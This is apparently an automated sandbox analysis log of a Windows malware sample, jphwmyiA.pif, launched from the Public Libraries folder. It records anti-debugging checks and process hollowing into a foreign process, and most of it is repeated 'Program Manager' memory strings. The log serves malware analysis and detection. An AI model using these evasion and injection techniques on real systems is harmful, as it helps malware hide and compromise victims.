Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_00416F6A
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_004123F1 SetUnhandledExceptionFilter,	12_2_004123F1
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	16_2_0040CE09
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	16_2_0040E61C
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	16_2_00416F6A
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_2_004123F1 SetUnhandledExceptionFilter,	16_2_004123F1
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	16_1_0040CE09
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	16_1_0040E61C
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	16_1_00416F6A
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 16_1_004123F1 SetUnhandledExceptionFilter,	16_1_004123F1

Source: C:\Users\Public\Libraries\jphwmyiA.pif

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Windows\SysWOW64\brightness.exe	Memory allocated: C:\Users\Public\Libraries\jphwmyiA.pif base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Memory allocated: C:\Users\Public\Libraries\jphwmyiA.pif base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Memory allocated: C:\Users\Public\Libraries\jphwmyiA.pif base: 400000 protect: page execute and read and write

Sample uses process hollowing technique

Source: C:\Windows\SysWOW64\brightness.exe	Section unmapped: C:\Users\Public\Libraries\jphwmyiA.pif base address: 400000	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section unmapped: C:\Users\Public\Libraries\jphwmyiA.pif base address: 400000	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section unmapped: C:\Users\Public\Libraries\jphwmyiA.pif base address: 400000

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\brightness.exe	Memory written: C:\Users\Public\Libraries\jphwmyiA.pif base: 223008	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Memory written: C:\Users\Public\Libraries\jphwmyiA.pif base: 2B4008	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Memory written: C:\Users\Public\Libraries\jphwmyiA.pif base: 2CA008

Source: C:\Windows\SysWOW64\brightness.exe	Process created: C:\Users\Public\Libraries\jphwmyiA.pif C:\Users\Public\Libraries\jphwmyiA.pif	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Process created: C:\Users\Public\Libraries\jphwmyiA.pif C:\Users\Public\Libraries\jphwmyiA.pif	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Process created: C:\Users\Public\Libraries\jphwmyiA.pif C:\Users\Public\Libraries\jphwmyiA.pif

Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q\(
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q\%
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qh>B&
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A55B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q<h_
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q(\\|*
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q\0
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q\-
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q8>P&
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q$t5&
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qx]}
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A4CD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qdqS*
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026283000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qd.-&
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qtDl&
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q$e
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q\
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A4CD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qxQY*
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A55B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q(@f
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q0i\&
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qt[8&
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q,!Z&
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qTKw&
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q\I
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q<pg&
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qd6p
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q\1
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q8(e&
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q41b*
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q\=
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026283000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qlK1&
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q\;
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q\9
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q8yd*
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q`*y
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q Uc*
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q\b
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q\m
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q\W
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q,\n*
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q\U
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qp[F&
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q\Q
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q\_
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qQr&
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qXb5&
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q\Z
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qx\t
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q\|ap&
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q0!L&
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q4iN&
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A55B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q4W`
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q\|x<&
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A55B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q(?]
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q\{
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qLE?&
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q\z
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q4!>&
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qX*
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qX'
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q8i@&
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qX%
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qXBv*
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q(LX&
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerpeM$LR]qX5P&
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q,LJ&
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qX@
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q`4&
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A55B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q\*_
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qX>
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qXK
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q4\{
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qxxJ&
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qX3
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qX2
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qX;
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qX6
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q 0{
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qXd
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qx_r
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qh[b&
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qX_
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A55B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q@ra
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qbw*
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qXzb&
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qD(;&
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qlGo
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qHp=&
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qhqM&
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qXS
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qLsW&
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q(Az
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qX\
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qXW
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qpPh
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qXV
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qdn3&
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q@Va&
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qXt
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A4CD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q({Q*
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qXr
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q@su
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qlkx*
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q0L<&
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qHfi*
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qX\|
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qh#v*
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qHJ@&
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q\|]o
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q W&
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qpEl
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q`dm*
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A4CD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q<1S*
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q,&M&
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qpUr&
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qT@
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qT=
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qk_&
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qTE
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q0&?&
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qTB
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qH@l*
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q\|sI&
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q<-J&
Source: jphwmyiA.pif, 0000000C.00000002.3456791683.000000002ACEE000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: Program Managert
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qT,
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qT*
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qT7
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qT8
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qT4
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Managerh
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qT]
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A55B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qL~_
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A4CD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q8\Q*
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qTz{&
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qT\
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q $v
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qTh
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q$I&
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Managerl
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q@-<&
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q\TW&
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qTa
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q4Mx
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A4CD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q <Z*
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qTX
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A55B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q8Vf
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qHsp&
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qP7a&
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qXGi*
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qTy
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026283000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q8]1&
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q0Oo&
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qX
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q#O&
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qTo
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qh4m
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qLs
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qTk
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qPru*
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qTi
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qTw
